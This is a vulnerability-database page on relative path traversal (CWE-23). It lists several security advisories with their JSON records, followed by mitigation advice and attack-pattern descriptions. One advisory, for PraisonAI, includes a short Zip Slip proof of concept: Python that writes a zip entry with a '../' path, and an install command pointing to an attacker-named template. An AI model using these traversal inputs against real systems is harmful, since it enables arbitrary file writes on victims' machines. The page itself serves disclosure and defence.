Common Weakness Enumeration

CWE-23

Allowed

Relative Path Traversal

Abstraction: Base · Status: Draft

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

778 vulnerabilities reference this CWE, most recent first.

GHSA-4PGP-HX9Q-53RP

Vulnerability from github – Published: 2024-04-03 18:30 – Updated: 2024-04-03 18:30
VLAI
Details

A vulnerability in Cisco Emergency Responder could allow an authenticated, remote attacker to conduct a directory traversal attack, which could allow the attacker to perform arbitrary actions on an affected device. This vulnerability is due to insufficient protections for the web UI of an affected system. An attacker could exploit this vulnerability by sending crafted requests to the web UI. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user, such as accessing password or log files or uploading and deleting existing files from the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-20352"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-03T17:15:49Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in Cisco Emergency Responder could allow an authenticated, remote attacker to conduct a directory traversal attack, which could allow the attacker to perform arbitrary actions on an affected device. This vulnerability is due to insufficient protections for the web UI of an affected system. An attacker could exploit this vulnerability by sending crafted requests to the web UI. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user, such as accessing password or log files or uploading and deleting existing files from the system.",
  "id": "GHSA-4pgp-hx9q-53rp",
  "modified": "2024-04-03T18:30:41Z",
  "published": "2024-04-03T18:30:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20352"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cem-csrf-suCmNjFr"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4PH2-F6PF-79WV

Vulnerability from github – Published: 2026-04-06 23:08 – Updated: 2026-04-07 22:09
VLAI
Summary
PraisonAI Has Arbitrary File Write (Zip Slip) in Templates Extraction
Details

The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying if the files within the archive resolve outside of the intended extraction directory.

Details

Location: src/praisonai/praisonai/cli/features/templates.py (Line 852)

Vulnerable Code snippet:

zip_ref.extractall(tmpdir)

During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using zip_ref.extractall(tmpdir). A specially crafted ZIP archive can contain file entries with relative paths (such as ../../../../tmp/evil.sh). If extracting this archive in older Python versions or environments where extraction rules aren't strict, extractall will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.

PoC

  1. Generate a malicious zip payload:
import zipfile

with zipfile.ZipFile('malicious_template.zip', 'w') as z:
    # Adding a file that traverses directories
    z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')
  1. Trick a user into installing the malicious template:
praisonai templates install github:attacker/malicious_template
  1. Observe the zip_slip_pwned.txt file created in /tmp/ on the victim's machine.

Impact

This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.5.112"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "PraisonAI"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.113"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39307"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-06T23:08:55Z",
    "nvd_published_at": "2026-04-07T17:16:36Z",
    "severity": "HIGH"
  },
  "details": "The PraisonAI templates installation feature is vulnerable to a \"Zip Slip\" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python\u0027s `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. \n\n### Details\nLocation: `src/praisonai/praisonai/cli/features/templates.py` (Line 852)\n\nVulnerable Code snippet:\n```python\nzip_ref.extractall(tmpdir)\n```\n\nDuring installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren\u0027t strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim\u0027s filesystem.\n\n### PoC\n1. Generate a malicious zip payload:\n```python\nimport zipfile\n\nwith zipfile.ZipFile(\u0027malicious_template.zip\u0027, \u0027w\u0027) as z:\n    # Adding a file that traverses directories\n    z.writestr(\u0027../../../../../../../tmp/zip_slip_pwned.txt\u0027, \u0027pwned by zip slip\u0027)\n```\n2. Trick a user into installing the malicious template:\n```bash\npraisonai templates install github:attacker/malicious_template\n```\n3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim\u0027s machine.\n\n### Impact\nThis is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).",
  "id": "GHSA-4ph2-f6pf-79wv",
  "modified": "2026-04-07T22:09:54Z",
  "published": "2026-04-06T23:08:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39307"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.113"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI Has Arbitrary File Write (Zip Slip) in Templates Extraction"
}

GHSA-4QHP-652W-C22X

Vulnerability from github – Published: 2024-01-18 16:12 – Updated: 2024-01-19 20:32
VLAI
Summary
Unsecured endpoints in the jupyter-lsp server extension
Details

Impact

Installations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory.

Patches

Version 2.2.2 has been patched.

Workarounds

Users of jupyterlab who do not use jupyterlab-lsp can uninstall jupyter-lsp.

Credits

We would like to credit Bary Levy, researcher of pillar.security research team, for the discovery and responsible disclosure of this vulnerability.

Edit: based on advice from pillar.security the Confidentiality/Integrity/Availability were increased to High to reflect potential for critical impact on publicly hosted jupyter-server instances lacking isolation of user privileges on operating system level (for best practices please consult https://jupyterhub.readthedocs.io/en/stable/explanation/websecurity.html#protect-users-from-each-other) and CWE-94 was added due to a potential vulnerability chaining in specific environments.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.2.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "jupyter-lsp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-22415"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-18T16:12:28Z",
    "nvd_published_at": "2024-01-18T21:15:09Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nInstallations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory.\n\n### Patches\nVersion 2.2.2 has been patched.\n\n### Workarounds\nUsers of jupyterlab who do not use jupyterlab-lsp can uninstall jupyter-lsp.\n\n### Credits\nWe would like to credit Bary Levy, researcher of pillar.security research team, for the discovery and responsible disclosure of this vulnerability.\n\nEdit: based on advice from pillar.security the Confidentiality/Integrity/Availability were increased to High to reflect potential for critical impact on publicly hosted jupyter-server instances lacking isolation of user privileges on operating system level (for best practices please consult https://jupyterhub.readthedocs.io/en/stable/explanation/websecurity.html#protect-users-from-each-other) and CWE-94 was added due to a potential vulnerability chaining in specific environments.",
  "id": "GHSA-4qhp-652w-c22x",
  "modified": "2024-01-19T20:32:07Z",
  "published": "2024-01-18T16:12:28Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jupyter-lsp/jupyterlab-lsp/security/advisories/GHSA-4qhp-652w-c22x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22415"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jupyter-lsp/jupyterlab-lsp/commit/4ad12f204ad0b85580fc32137c647baaff044e95"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jupyter-lsp/jupyterlab-lsp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jupyter-lsp/jupyterlab-lsp/releases/tag/v5.0.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unsecured endpoints in the jupyter-lsp server extension"
}

GHSA-4RFH-V443-HVGH

Vulnerability from github – Published: 2023-11-14 18:30 – Updated: 2023-11-14 18:30
VLAI
Details

A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.2 through 8.4.0 and 8.3.2 through 8.3.0 and 8.2.2 allows attacker to read arbitrary files via crafted http requests.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-42783"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-14T18:15:53Z",
    "severity": "HIGH"
  },
  "details": "A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.2 through 8.4.0 and 8.3.2 through 8.3.0 and 8.2.2 allows attacker to read arbitrary files via crafted http requests.",
  "id": "GHSA-4rfh-v443-hvgh",
  "modified": "2023-11-14T18:30:29Z",
  "published": "2023-11-14T18:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42783"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/psirt/FG-IR-23-143"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4W42-HX2P-M2JW

Vulnerability from github – Published: 2024-02-06 12:30 – Updated: 2024-08-22 21:31
VLAI
Details

In JetBrains TeamCity before 2023.11.2 limited directory traversal was possible in the Kotlin DSL documentation

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-24938"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-06T10:15:10Z",
    "severity": "MODERATE"
  },
  "details": "In JetBrains TeamCity before 2023.11.2 limited directory traversal was possible in the Kotlin DSL documentation",
  "id": "GHSA-4w42-hx2p-m2jw",
  "modified": "2024-08-22T21:31:27Z",
  "published": "2024-02-06T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24938"
    },
    {
      "type": "WEB",
      "url": "https://www.jetbrains.com/privacy-security/issues-fixed"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4W5P-QWH4-XC23

Vulnerability from github – Published: 2025-02-23 18:30 – Updated: 2025-02-23 18:30
VLAI
Details

A vulnerability has been found in PHPGurukul Online Nurse Hiring System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/manage-nurse.php. The manipulation of the argument profilepic leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting vulnerability classes.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1588"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-23T16:15:08Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in PHPGurukul Online Nurse Hiring System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/manage-nurse.php. The manipulation of the argument profilepic leads to path traversal: \u0027../filedir\u0027. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting vulnerability classes.",
  "id": "GHSA-4w5p-qwh4-xc23",
  "modified": "2025-02-23T18:30:24Z",
  "published": "2025-02-23T18:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1588"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wqywfvc/CVE/issues/16"
    },
    {
      "type": "WEB",
      "url": "https://phpgurukul.com"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.296572"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.296572"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.505441"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-53QH-2V26-Q8GX

Vulnerability from github – Published: 2025-04-30 12:31 – Updated: 2025-04-30 12:31
VLAI
Details

A vulnerability in the “Certificates and Keys” functionality of the web application of ctrlX OS allows a remote authenticated (low-privileged) attacker to write arbitrary certificates in arbitrary file system paths via a crafted HTTP request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-24350"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-30T12:15:21Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the \u201cCertificates and Keys\u201d functionality of the web application of ctrlX OS allows a remote authenticated (low-privileged) attacker to write arbitrary certificates in arbitrary file system paths via a crafted HTTP request.",
  "id": "GHSA-53qh-2v26-q8gx",
  "modified": "2025-04-30T12:31:25Z",
  "published": "2025-04-30T12:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24350"
    },
    {
      "type": "WEB",
      "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-640452.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-53RW-GCGW-2723

Vulnerability from github – Published: 2023-07-06 19:24 – Updated: 2025-04-30 15:30
VLAI
Details

A vulnerability has been identified in syngo Dynamics (All versions < VA40G HF01). syngo Dynamics application server hosts a web service using an operation with improper write access control that could allow directory listing in any folder accessible to the account assigned to the website’s application pool.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-42892"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-11-17T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in syngo Dynamics (All versions \u003c VA40G HF01). syngo Dynamics application server hosts a web service using an operation with improper write access control that could allow directory listing in any folder accessible to the account assigned to the website\u2019s application pool.",
  "id": "GHSA-53rw-gcgw-2723",
  "modified": "2025-04-30T15:30:38Z",
  "published": "2023-07-06T19:24:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42892"
    },
    {
      "type": "WEB",
      "url": "https://www.siemens-healthineers.com/en-us/support-documentation/cybersecurity/shsa-741697"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-544V-V93W-X43G

Vulnerability from github – Published: 2026-04-20 09:30 – Updated: 2026-04-20 09:30
VLAI
Details

ThreatSonar Anti-Ransomware developed by TeamT5 has an Arbitrary File Deletion vulnerability. Authenticated remote attackers with web access can exploit Path Traversal to delete arbitrary files on the system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5966"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-20T08:16:11Z",
    "severity": "HIGH"
  },
  "details": "ThreatSonar Anti-Ransomware developed by TeamT5 has an Arbitrary File Deletion vulnerability. Authenticated remote attackers with web access can exploit Path Traversal to delete arbitrary files on the system.",
  "id": "GHSA-544v-v93w-x43g",
  "modified": "2026-04-20T09:30:45Z",
  "published": "2026-04-20T09:30:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5966"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/en/cp-139-10832-05f3a-2.html"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-10831-a734d-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-5458-7HH9-V7P4

Vulnerability from github – Published: 2026-03-25 21:30 – Updated: 2026-03-27 19:49
VLAI
Summary
pf4j is vulnerable to Path Traversal or Zip Slip attack through improper handling of zip entry names
Details

pf4j before 20c2f80 has a path traversal vulnerability in the extract() function of Unzip.java, where improper handling of zip entry names can allow directory traversal or Zip Slip attacks, due to a lack of proper path normalization and validation.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.pf4j:pf4j"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.14.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-70952"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T19:49:00Z",
    "nvd_published_at": "2026-03-25T19:16:28Z",
    "severity": "HIGH"
  },
  "details": "pf4j before 20c2f80 has a path traversal vulnerability in the extract() function of Unzip.java, where improper handling of zip entry names can allow directory traversal or Zip Slip attacks, due to a lack of proper path normalization and validation.",
  "id": "GHSA-5458-7hh9-v7p4",
  "modified": "2026-03-27T19:49:01Z",
  "published": "2026-03-25T21:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70952"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pf4j/pf4j/issues/618"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pf4j/pf4j/issues/623"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pf4j/pf4j/commit/20c2f80089d1ea779e22c2de5f109a0bce4e1b14"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/weaver4VD/410f23adb24ef5f5077f021f4393e705"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pf4j/pf4j"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "pf4j is vulnerable to Path Traversal or Zip Slip attack through improper handling of zip entry names "
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20.1
Implementation

Strategy: Input Validation

  • Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
  • Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
  • realpath() in C
  • getCanonicalPath() in Java
  • GetFullPath() in ASP.NET
  • realpath() or abs_path() in Perl
  • realpath() in PHP
Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-139: Relative Path Traversal

An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.